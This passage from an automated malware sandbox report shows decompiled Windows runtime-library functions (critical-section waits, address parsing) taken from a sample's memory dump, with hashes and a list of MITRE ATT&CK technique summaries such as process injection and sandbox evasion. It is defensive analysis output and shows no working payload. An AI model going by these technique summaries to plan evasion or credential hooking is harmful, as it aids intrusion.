														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E01F45329(_t74, _t92);
													_push(1);
													_t48 = E01F453A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x01f453ab
0x01f453ae
0x01f453b1
0x01f453b4
0x01f453b7
0x01f605b6
0x01f605c0
0x01f605c3
0x00000000
0x01f605c9
0x01f605c9
0x01f605cc
0x01f605d5
0x01f605d5
0x01f453bd
0x01f453bd
0x01f453bd
0x01f453be
0x01f453be
0x01f453be
0x01f453c0
0x00000000
0x00000000
0x01f82269
0x01f8226d
0x01f82349
0x01f8234d
0x01f82273
0x01f82276
0x01f82279
0x01f8227e
0x01f82283
0x01f82287
0x01f8228a
0x01f8228d
0x01f8228f
0x01f822bc
0x01f822bc
0x01f822bc
0x01f822be
0x01f822c4
0x01f822cc
0x01f822d0
0x01f822d6
0x01f822d7
0x01f822da
0x01f822df
0x01f822e4
0x00000000
0x00000000
0x01f822e6
0x01f822e9
0x01f822f4
0x01f822f9
0x01f822fa
0x01f82305
0x01f82314
0x01f82319
0x01f8231a
0x01f8231d
0x01f82320
0x01f82323
0x01f82323
0x01f82328
0x01f8232d
0x01f8232f
0x01f82331
0x01f82336
0x01f82336
0x01f8233b
0x01f8233d
0x01f82350
0x01f82351
0x01f82356
0x01f82359
0x01f82359
0x01f8235b
0x01f8235d
0x01f45367
0x01f4536b
0x01f45372
0x00000000
0x00000000
0x00000000
0x00000000
0x01f82363
0x01f82363
0x01f82369
0x01f8236a
0x01f8236c
0x01f82371
0x01f82373
0x00000000
0x01f82379
0x01f82379
0x01f8237a
0x01f8237f
0x01f8237f
0x01f82385
0x01f82386
0x01f82389
0x01f8238e
0x01f82390
0x01f45378
0x01f4537c
0x01f82396
0x01f82396
0x01f82397
0x01f8239c
0x01f823a2
0x01f823a3
0x01f823a6
0x01f823ab
0x01f823ad
0x00000000
0x01f823b3
0x01f823b3
0x01f823b4
0x01f823b9
0x01f823ba
0x01f823ba
0x01f823bc
0x01f823bf
0x00000000
0x00000000
0x01f79153
0x01f79158
0x01f7915a
0x01f7915e
0x01f79160
0x00000000
0x01f79166
0x01f79166
0x01f79171
0x01f79176
0x01f79176
0x00000000
0x01f79160
0x01f823c6
0x01f823cb
0x01f823ce
0x01f823d7
0x01f823d7
0x01f823ad
0x01f82390
0x01f82373
0x01f8233f
0x01f8233f
0x00000000
0x01f8233f
0x01f82291
0x01f82291
0x01f82293
0x01f82295
0x01f8229a
0x01f822a1
0x01f822a3
0x01f822a7
0x01f822a9
0x00000000
0x00000000
0x01f822ab
0x01f822ad
0x01f822af
0x00000000
0x00000000
0x00000000
0x01f822af
0x01f822b1
0x01f822b4
0x01f822b4
0x01f822b6
0x00000000
0x00000000
0x00000000
0x00000000
0x01f822b6
0x01f8228f
0x00000000
0x01f8226d
0x01f453cb
0x01f453ce
0x01f453d0
0x01f453d4
0x01f453d6
0x00000000
0x01f453d8
0x01f453e3
0x01f453ea
0x01f453ea
0x01f453d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01F822F4

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01F822FC
RTL: Re-Waiting, xrefs: 01F82328
RTL: Resource at %p, xrefs: 01F8230B

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 98c7044be558c384ed6a0b571fd126cc8560807be9912afa0e3a241445b8b5bf
Instruction ID: 69f4de76a1504d14781f98f98e83c746c5168ad817feb56b39d6e40343c3e81e
Opcode Fuzzy Hash: 98c7044be558c384ed6a0b571fd126cc8560807be9912afa0e3a241445b8b5bf
Instruction Fuzzy Hash: C3510771600706ABEB15EB28CC80FA677ADAF54320F104219FD49DB285EA73E841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01F4EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E01F4EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E01F3DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x200793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E01F216C0(_t39);
				} else {
					_t40 = E01F1F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E01F63915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E01F201A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x200793c; // 0x0
								_push(_t85);
								_t44 = E01F21F28(_t71);
							} else {
								_t44 = E01F1F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E01F63915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E01FA2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E01F4EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E01F64FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E01F73F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E01F73F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x20020c0;
								if(_t85 != 0x20020c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E01FA217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E01F73F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x01f4ec56
0x01f4ec56
0x01f4ec56
0x01f4ec5c
0x01f4ec64
0x01f823e6
0x01f823eb
0x01f823eb
0x01f4ec6a
0x01f4ec6c
0x01f4ec6f
0x01f823f3
0x01f823f8
0x01f823fa
0x01f823fc
0x01f4ec75
0x01f4ec76
0x01f4ec76
0x01f4ec7b
0x01f4ec7c
0x01f4ec7e
0x01f82406
0x01f82407
0x01f8240c
0x01f8240d
0x01f8240d
0x01f8240d
0x01f82414
0x01f82417
0x01f8241e
0x01f82435
0x01f82438
0x01f8243c
0x01f8243f
0x01f82442
0x01f82443
0x01f82446
0x01f82449
0x01f82453
0x01f82455
0x01f8245b
0x01f8245b
0x01f4eb99
0x01f4eb99
0x01f4eb9c
0x01f4eb9d
0x01f4eb9f
0x01f4eba2
0x01f82465
0x01f8246b
0x01f8246d
0x01f4eba8
0x01f4eba9
0x01f4eba9
0x01f4ebae
0x01f4ebb3
0x01f4ebb9
0x01f4ebbb
0x01f82513
0x01f82514
0x01f82519
0x01f8251b
0x01f4ec2a
0x01f4ec2d
0x01f4ec33
0x01f4ec36
0x01f4ec3a
0x01f4ec3e
0x01f4ec40
0x01f4ec47
0x01f4ec47
0x01f4ec40
0x01f222c6
0x01f4ebc1
0x01f4ebc1
0x01f4ebc5
0x01f4ec9a
0x01f4ec9a
0x01f4ebd6
0x01f4ebd6
0x00000000
0x01f4ebbb
0x01f82477
0x01f8247c
0x01f82486
0x01f8248b
0x01f82496
0x01f8249b
0x01f8249d
0x01f824a0
0x01f824a3
0x01f824aa
0x01f824aa
0x01f824a5
0x01f824a5
0x01f824a5
0x01f824ac
0x01f824af
0x01f824b0
0x01f824b3
0x01f824b9
0x01f824ba
0x01f824bb
0x01f824c6
0x01f824cb
0x01f824cd
0x01f824d0
0x01f824d1
0x01f824d4
0x01f824d6
0x01f824d9
0x01f824d9
0x01f824dc
0x01f824df
0x01f824e1
0x01f824e7
0x01f824e9
0x01f824ec
0x01f824ef
0x01f824f2
0x01f824f2
0x01f824ef
0x01f824e7
0x01f824fa
0x01f824ff
0x01f82501
0x01f82503
0x01f82506
0x01f8250b
0x01f4eb8c
0x01f4eb93
0x00000000
0x00000000
0x01f4eb93
0x00000000
0x01f4eb99
0x01f4ec85
0x01f4ec85
0x01f4ec85
0x00000000

Strings

RTL: Re-Waiting, xrefs: 01F824FA
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01F8248D
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01F824BD

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 8ebaf2aef34a61f13e54cbe790e1392b80302cd558115538732c6252b8b241b1
Instruction ID: 1cdbdfc0d5b10de2dbb6bf4bc9fd7627ddba8b1ff0a9351e0f45f7a8425f2337
Opcode Fuzzy Hash: 8ebaf2aef34a61f13e54cbe790e1392b80302cd558115538732c6252b8b241b1
Instruction Fuzzy Hash: 6F41E671A00605EBD720EB6CCC85FAA7BB9FF44320F208605F6559B2C2D676E941CB70

Uniqueness

Uniqueness Score: -1.00%

Function 01F5FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01F5FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E01F5EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E01F5EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E01F5685D(_t167, 4) == 0) {
								if(E01F5685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E01F5685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E01F5685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E01F38980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E01F2DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E01F5EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E01F5EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x01f5fcd1
0x01f5fcd6
0x01f5fcd9
0x01f5fcdc
0x01f5fcdf
0x01f5fce2
0x01f5fce5
0x01f5fce8
0x01f5fceb
0x01f5fced
0x01f5fced
0x01f5fcf3
0x00000000
0x00000000
0x01f5fcfc
0x01f5fcfe
0x01f5fdc1
0x01f8ecbd
0x00000000
0x01f8eccc
0x01f8eccc
0x01f8ecd2
0x00000000
0x00000000
0x01f8ecdf
0x01f8ece0
0x01f8ece4
0x01f8eceb
0x01f8ecee
0x01f8eca8
0x01f8eca8
0x01f8ecaa
0x01f5fd76
0x01f5fd79
0x01f5fdb4
0x01f5fdb5
0x01f5fdb6
0x00000000
0x01f5fdb6
0x01f5fd7e
0x01f8ecfc
0x01f5fe2f
0x00000000
0x01f5fe2f
0x01f8ed08
0x01f8ed0f
0x01f8ed17
0x01f8ed1b
0x00000000
0x01f8ed1b
0x01f5fd88
0x00000000
0x00000000
0x01f5fd94
0x01f5fd99
0x01f5fda1
0x00000000
0x00000000
0x01f5fdb0
0x00000000
0x01f5fdb0
0x01f8ecbd
0x01f5fdc7
0x01f5fdcb
0x00000000
0x01f5fdd7
0x01f5fde3
0x01f5fe06
0x01f71fe7
0x00000000
0x00000000
0x01f71fef
0x01f71ff0
0x01f71ff4
0x01f71ff7
0x01f71ffa
0x01f71ffd
0x01f72000
0x00000000
0x00000000
0x01f8ecf1
0x00000000
0x01f8ecf1
0x00000000
0x01f5fe06
0x01f5fde8
0x01f5fdec
0x01f5fdef
0x01f5fdf2
0x00000000
0x01f5fdf2
0x01f5fdcb
0x01f5fd04
0x01f5fd05
0x01f8ec67
0x00000000
0x00000000
0x01f8ec6f
0x00000000
0x01f8ec6f
0x01f5fd13
0x01f5fd3c
0x01f5fd40
0x01f8ec75
0x01f8ec7a
0x00000000
0x01f8ec8a
0x01f8ec8a
0x01f8ec90
0x01f8ecb2
0x01f5fd73
0x01f5fd73
0x00000000
0x01f5fd73
0x01f8ec95
0x00000000
0x00000000
0x01f8eca1
0x01f8eca4
0x01f8eca5
0x00000000
0x01f8eca5
0x01f8ec7a
0x01f5fd4a
0x00000000
0x01f5fd6e
0x01f5fd6e
0x01f5fd71
0x00000000
0x01f5fd71
0x01f5fd4a
0x01f5fd21
0x01f6a3a1
0x00000000
0x01f6a3a1
0x01f5fd36
0x01f7200b
0x01f72012
0x00000000
0x00000000
0x01f72018
0x00000000
0x01f72018
0x00000000
0x01f5fd36
0x01f5fe0f
0x01f5fe16
0x01f6a3ad
0x00000000
0x00000000
0x01f6a3b3
0x01f6a3b3
0x01f5fe1f
0x01f8ed25
0x01f8ed86
0x00000000
0x00000000
0x01f8ed91
0x01f8ed95
0x01f8ed95
0x01f8ed9a
0x01f8edad
0x01f8edb3
0x01f8edba
0x01f8edc4
0x01f8edc9
0x00000000
0x01f8edcc
0x01f8ed2a
0x01f8ed55
0x00000000
0x00000000
0x01f8ed61
0x01f8ed66
0x01f8ed6e
0x00000000
0x00000000
0x01f8ed7d
0x00000000
0x01f8ed7d
0x01f8ed30
0x00000000
0x00000000
0x01f8ed3c
0x01f8ed43
0x01f8ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 01F5FD94

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: 7775871c6b2dbe35ced855d579fef9e735377bc2165743d90c02082bd4f2306e
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 6491C272D0020AEFDF64DF98C8456EEBBB4FF45704F2080AADA11E7252E7325A45DB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
